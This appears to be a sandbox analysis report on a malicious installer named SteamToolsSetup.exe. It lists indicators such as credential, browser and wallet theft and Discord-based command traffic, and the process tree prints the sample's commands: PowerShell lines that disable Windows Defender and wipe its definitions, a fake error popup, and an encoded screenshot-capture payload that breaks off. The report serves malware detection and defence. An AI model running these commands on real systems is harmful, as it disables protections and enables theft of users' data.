1cc8e9d5a1194fde2e6d96873f943aad0b69ba821834ab7893f0d44519ac7ce7

Analysis

max time kernel
149s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-11-2024 17:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SteamToolsSetup.exe
Size

5.9MB
MD5

21173abe9a3834334776ca581aaf9d54
SHA1

a9ca53726a2421019d0dad6350e25ac48796129d
SHA256

1cc8e9d5a1194fde2e6d96873f943aad0b69ba821834ab7893f0d44519ac7ce7
SHA512

7ea2980b1bd5bf0636126aaaa8adb78f201e1c95f986af932537fa44bcfc83df1bf8446fa9f1bd52aff8400381760eb5a368c59abe0ba6b28701dd11bb2ecdb2
SSDEEP

98304:yQ+4S7SFi65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFkzkkqkg4gaP:yD4SYDOYjJlpZstQoS9Hf12VKXHztqwZ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
836	powershell.exe
1452	powershell.exe
5076	powershell.exe
5004	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	SteamToolsSetup.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1276	cmd.exe
4640	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5000	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe
4312	SteamToolsSetup.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
21	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2812	tasklist.exe
1000	tasklist.exe
4972	tasklist.exe
4048	tasklist.exe
4860	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000b000000023ba1-21.dat	upx
behavioral2/memory/4312-25-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp	upx
behavioral2/memory/4312-31-0x00007FFE26950000-0x00007FFE26974000-memory.dmp	upx
behavioral2/memory/4312-32-0x00007FFE2F900000-0x00007FFE2F90F000-memory.dmp	upx
behavioral2/files/0x000a000000023b9b-48.dat	upx
behavioral2/files/0x000a000000023b9a-47.dat	upx
behavioral2/files/0x000a000000023b99-46.dat	upx
behavioral2/files/0x000a000000023b98-45.dat	upx
behavioral2/files/0x000a000000023b97-44.dat	upx
behavioral2/files/0x000a000000023b96-43.dat	upx
behavioral2/files/0x000a000000023b95-42.dat	upx
behavioral2/files/0x000a000000023b93-41.dat	upx
behavioral2/files/0x0009000000023bbf-40.dat	upx
behavioral2/files/0x0008000000023bba-39.dat	upx
behavioral2/files/0x000e000000023bb1-38.dat	upx
behavioral2/files/0x000b000000023ba0-35.dat	upx
behavioral2/files/0x000a000000023b9e-34.dat	upx
behavioral2/files/0x000a000000023b9f-30.dat	upx
behavioral2/files/0x000a000000023b94-28.dat	upx
behavioral2/memory/4312-54-0x00007FFE268A0000-0x00007FFE268CC000-memory.dmp	upx
behavioral2/memory/4312-56-0x00007FFE26880000-0x00007FFE26898000-memory.dmp	upx
behavioral2/memory/4312-58-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp	upx
behavioral2/memory/4312-60-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp	upx
behavioral2/memory/4312-62-0x00007FFE25B50000-0x00007FFE25B69000-memory.dmp	upx
behavioral2/memory/4312-65-0x00007FFE26870000-0x00007FFE2687D000-memory.dmp	upx
behavioral2/memory/4312-67-0x00007FFE21D00000-0x00007FFE21D2E000-memory.dmp	upx
behavioral2/memory/4312-69-0x00007FFE26950000-0x00007FFE26974000-memory.dmp	upx
behavioral2/memory/4312-70-0x00007FFE16B50000-0x00007FFE16C07000-memory.dmp	upx
behavioral2/memory/4312-64-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp	upx
behavioral2/memory/4312-73-0x00007FFE167D0000-0x00007FFE16B47000-memory.dmp	upx
behavioral2/memory/4312-76-0x00007FFE2C760000-0x00007FFE2C775000-memory.dmp	upx
behavioral2/memory/4312-81-0x00007FFE17390000-0x00007FFE174A8000-memory.dmp	upx
behavioral2/memory/4312-80-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp	upx
behavioral2/memory/4312-78-0x00007FFE26910000-0x00007FFE2691D000-memory.dmp	upx
behavioral2/memory/4312-102-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp	upx
behavioral2/memory/4312-108-0x00007FFE25B50000-0x00007FFE25B69000-memory.dmp	upx
behavioral2/memory/4312-164-0x00007FFE21D00000-0x00007FFE21D2E000-memory.dmp	upx
behavioral2/memory/4312-191-0x00007FFE16B50000-0x00007FFE16C07000-memory.dmp	upx
behavioral2/memory/4312-192-0x00007FFE167D0000-0x00007FFE16B47000-memory.dmp	upx
behavioral2/memory/4312-251-0x00007FFE26950000-0x00007FFE26974000-memory.dmp	upx
behavioral2/memory/4312-256-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp	upx
behavioral2/memory/4312-250-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp	upx
behavioral2/memory/4312-255-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp	upx
behavioral2/memory/4312-313-0x00007FFE167D0000-0x00007FFE16B47000-memory.dmp	upx
behavioral2/memory/4312-307-0x00007FFE26140000-0x00007FFE2615E000-memory.dmp	upx
behavioral2/memory/4312-324-0x00007FFE17390000-0x00007FFE174A8000-memory.dmp	upx
behavioral2/memory/4312-323-0x00007FFE26910000-0x00007FFE2691D000-memory.dmp	upx
behavioral2/memory/4312-322-0x00007FFE2C760000-0x00007FFE2C775000-memory.dmp	upx
behavioral2/memory/4312-321-0x00007FFE16B50000-0x00007FFE16C07000-memory.dmp	upx
behavioral2/memory/4312-320-0x00007FFE21D00000-0x00007FFE21D2E000-memory.dmp	upx
behavioral2/memory/4312-319-0x00007FFE26870000-0x00007FFE2687D000-memory.dmp	upx
behavioral2/memory/4312-318-0x00007FFE26950000-0x00007FFE26974000-memory.dmp	upx
behavioral2/memory/4312-317-0x00007FFE2F900000-0x00007FFE2F90F000-memory.dmp	upx
behavioral2/memory/4312-306-0x00007FFE26880000-0x00007FFE26898000-memory.dmp	upx
behavioral2/memory/4312-305-0x00007FFE268A0000-0x00007FFE268CC000-memory.dmp	upx
behavioral2/memory/4312-302-0x00007FFE17710000-0x00007FFE17B75000-memory.dmp	upx
behavioral2/memory/4312-309-0x00007FFE25B50000-0x00007FFE25B69000-memory.dmp	upx
behavioral2/memory/4312-308-0x00007FFE25FC0000-0x00007FFE26131000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3460	cmd.exe
1136	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4416	WMIC.exe
1636	WMIC.exe
3304	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2668	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
5076	powershell.exe
836	powershell.exe
836	powershell.exe
5076	powershell.exe
5076	powershell.exe
836	powershell.exe
4640	powershell.exe
4640	powershell.exe
1576	powershell.exe
1576	powershell.exe
4640	powershell.exe
1576	powershell.exe
5004	powershell.exe
5004	powershell.exe
2820	powershell.exe
2820	powershell.exe
2820	powershell.exe
1452	powershell.exe
1452	powershell.exe
2452	powershell.exe
2452	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1000	tasklist.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeIncreaseQuotaPrivilege	1452	WMIC.exe
Token: SeSecurityPrivilege	1452	WMIC.exe
Token: SeTakeOwnershipPrivilege	1452	WMIC.exe
Token: SeLoadDriverPrivilege	1452	WMIC.exe
Token: SeSystemProfilePrivilege	1452	WMIC.exe
Token: SeSystemtimePrivilege	1452	WMIC.exe
Token: SeProfSingleProcessPrivilege	1452	WMIC.exe
Token: SeIncBasePriorityPrivilege	1452	WMIC.exe
Token: SeCreatePagefilePrivilege	1452	WMIC.exe
Token: SeBackupPrivilege	1452	WMIC.exe
Token: SeRestorePrivilege	1452	WMIC.exe
Token: SeShutdownPrivilege	1452	WMIC.exe
Token: SeDebugPrivilege	1452	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1452	WMIC.exe
Token: SeRemoteShutdownPrivilege	1452	WMIC.exe
Token: SeUndockPrivilege	1452	WMIC.exe
Token: SeManageVolumePrivilege	1452	WMIC.exe
Token: 33	1452	WMIC.exe
Token: 34	1452	WMIC.exe
Token: 35	1452	WMIC.exe
Token: 36	1452	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1452	WMIC.exe
Token: SeSecurityPrivilege	1452	WMIC.exe
Token: SeTakeOwnershipPrivilege	1452	WMIC.exe
Token: SeLoadDriverPrivilege	1452	WMIC.exe
Token: SeSystemProfilePrivilege	1452	WMIC.exe
Token: SeSystemtimePrivilege	1452	WMIC.exe
Token: SeProfSingleProcessPrivilege	1452	WMIC.exe
Token: SeIncBasePriorityPrivilege	1452	WMIC.exe
Token: SeCreatePagefilePrivilege	1452	WMIC.exe
Token: SeBackupPrivilege	1452	WMIC.exe
Token: SeRestorePrivilege	1452	WMIC.exe
Token: SeShutdownPrivilege	1452	WMIC.exe
Token: SeDebugPrivilege	1452	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1452	WMIC.exe
Token: SeRemoteShutdownPrivilege	1452	WMIC.exe
Token: SeUndockPrivilege	1452	WMIC.exe
Token: SeManageVolumePrivilege	1452	WMIC.exe
Token: 33	1452	WMIC.exe
Token: 34	1452	WMIC.exe
Token: 35	1452	WMIC.exe
Token: 36	1452	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4416	WMIC.exe
Token: SeSecurityPrivilege	4416	WMIC.exe
Token: SeTakeOwnershipPrivilege	4416	WMIC.exe
Token: SeLoadDriverPrivilege	4416	WMIC.exe
Token: SeSystemProfilePrivilege	4416	WMIC.exe
Token: SeSystemtimePrivilege	4416	WMIC.exe
Token: SeProfSingleProcessPrivilege	4416	WMIC.exe
Token: SeIncBasePriorityPrivilege	4416	WMIC.exe
Token: SeCreatePagefilePrivilege	4416	WMIC.exe
Token: SeBackupPrivilege	4416	WMIC.exe
Token: SeRestorePrivilege	4416	WMIC.exe
Token: SeShutdownPrivilege	4416	WMIC.exe
Token: SeDebugPrivilege	4416	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4416	WMIC.exe
Token: SeRemoteShutdownPrivilege	4416	WMIC.exe
Token: SeUndockPrivilege	4416	WMIC.exe
Token: SeManageVolumePrivilege	4416	WMIC.exe
Token: 33	4416	WMIC.exe
Token: 34	4416	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4580 wrote to memory of 4312	4580	SteamToolsSetup.exe	85
PID 4580 wrote to memory of 4312	4580	SteamToolsSetup.exe	85
PID 4312 wrote to memory of 3176	4312	SteamToolsSetup.exe	87
PID 4312 wrote to memory of 3176	4312	SteamToolsSetup.exe	87
PID 4312 wrote to memory of 2440	4312	SteamToolsSetup.exe	88
PID 4312 wrote to memory of 2440	4312	SteamToolsSetup.exe	88
PID 4312 wrote to memory of 5084	4312	SteamToolsSetup.exe	89
PID 4312 wrote to memory of 5084	4312	SteamToolsSetup.exe	89
PID 4312 wrote to memory of 3200	4312	SteamToolsSetup.exe	93
PID 4312 wrote to memory of 3200	4312	SteamToolsSetup.exe	93
PID 3176 wrote to memory of 836	3176	cmd.exe	95
PID 3176 wrote to memory of 836	3176	cmd.exe	95
PID 2440 wrote to memory of 5076	2440	cmd.exe	96
PID 2440 wrote to memory of 5076	2440	cmd.exe	96
PID 3200 wrote to memory of 1000	3200	cmd.exe	97
PID 3200 wrote to memory of 1000	3200	cmd.exe	97
PID 5084 wrote to memory of 4904	5084	cmd.exe	98
PID 5084 wrote to memory of 4904	5084	cmd.exe	98
PID 4312 wrote to memory of 2960	4312	SteamToolsSetup.exe	167
PID 4312 wrote to memory of 2960	4312	SteamToolsSetup.exe	167
PID 2960 wrote to memory of 1452	2960	cmd.exe	102
PID 2960 wrote to memory of 1452	2960	cmd.exe	102
PID 4312 wrote to memory of 4912	4312	SteamToolsSetup.exe	103
PID 4312 wrote to memory of 4912	4312	SteamToolsSetup.exe	103
PID 4912 wrote to memory of 2100	4912	cmd.exe	105
PID 4912 wrote to memory of 2100	4912	cmd.exe	105
PID 4312 wrote to memory of 4624	4312	SteamToolsSetup.exe	106
PID 4312 wrote to memory of 4624	4312	SteamToolsSetup.exe	106
PID 4624 wrote to memory of 2668	4624	cmd.exe	146
PID 4624 wrote to memory of 2668	4624	cmd.exe	146
PID 4312 wrote to memory of 3612	4312	SteamToolsSetup.exe	109
PID 4312 wrote to memory of 3612	4312	SteamToolsSetup.exe	109
PID 3612 wrote to memory of 4416	3612	cmd.exe	111
PID 3612 wrote to memory of 4416	3612	cmd.exe	111
PID 4312 wrote to memory of 2480	4312	SteamToolsSetup.exe	170
PID 4312 wrote to memory of 2480	4312	SteamToolsSetup.exe	170
PID 2480 wrote to memory of 1636	2480	cmd.exe	114
PID 2480 wrote to memory of 1636	2480	cmd.exe	114
PID 4312 wrote to memory of 3556	4312	SteamToolsSetup.exe	117
PID 4312 wrote to memory of 3556	4312	SteamToolsSetup.exe	117
PID 4312 wrote to memory of 2384	4312	SteamToolsSetup.exe	118
PID 4312 wrote to memory of 2384	4312	SteamToolsSetup.exe	118
PID 4312 wrote to memory of 1496	4312	SteamToolsSetup.exe	121
PID 4312 wrote to memory of 1496	4312	SteamToolsSetup.exe	121
PID 4312 wrote to memory of 3688	4312	SteamToolsSetup.exe	122
PID 4312 wrote to memory of 3688	4312	SteamToolsSetup.exe	122
PID 4312 wrote to memory of 1276	4312	SteamToolsSetup.exe	123
PID 4312 wrote to memory of 1276	4312	SteamToolsSetup.exe	123
PID 4312 wrote to memory of 2832	4312	SteamToolsSetup.exe	125
PID 4312 wrote to memory of 2832	4312	SteamToolsSetup.exe	125
PID 3556 wrote to memory of 4048	3556	cmd.exe	129
PID 3556 wrote to memory of 4048	3556	cmd.exe	129
PID 2384 wrote to memory of 4972	2384	cmd.exe	130
PID 2384 wrote to memory of 4972	2384	cmd.exe	130
PID 1496 wrote to memory of 4700	1496	cmd.exe	131
PID 1496 wrote to memory of 4700	1496	cmd.exe	131
PID 3688 wrote to memory of 4860	3688	cmd.exe	132
PID 3688 wrote to memory of 4860	3688	cmd.exe	132
PID 4312 wrote to memory of 3460	4312	SteamToolsSetup.exe	133
PID 4312 wrote to memory of 3460	4312	SteamToolsSetup.exe	133
PID 4312 wrote to memory of 2116	4312	SteamToolsSetup.exe	136
PID 4312 wrote to memory of 2116	4312	SteamToolsSetup.exe	136
PID 4312 wrote to memory of 1512	4312	SteamToolsSetup.exe	134
PID 4312 wrote to memory of 1512	4312	SteamToolsSetup.exe	134

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4872	attrib.exe
4620	attrib.exe

C:\Users\Admin\AppData\Local\Temp\SteamToolsSetup.exe
"C:\Users\Admin\AppData\Local\Temp\SteamToolsSetup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4580
- C:\Users\Admin\AppData\Local\Temp\SteamToolsSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\SteamToolsSetup.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SteamToolsSetup.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SteamToolsSetup.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error: Unable to connect to host, check if any firewalls or security settings are blocking the connection.', 0, 'Error: Unable to connect to host', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error: Unable to connect to host, check if any firewalls or security settings are blocking the connection.', 0, 'Error: Unable to connect to host', 0+16);close()"
      4⤵
      PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2832
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3460
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1512
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:2116
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKA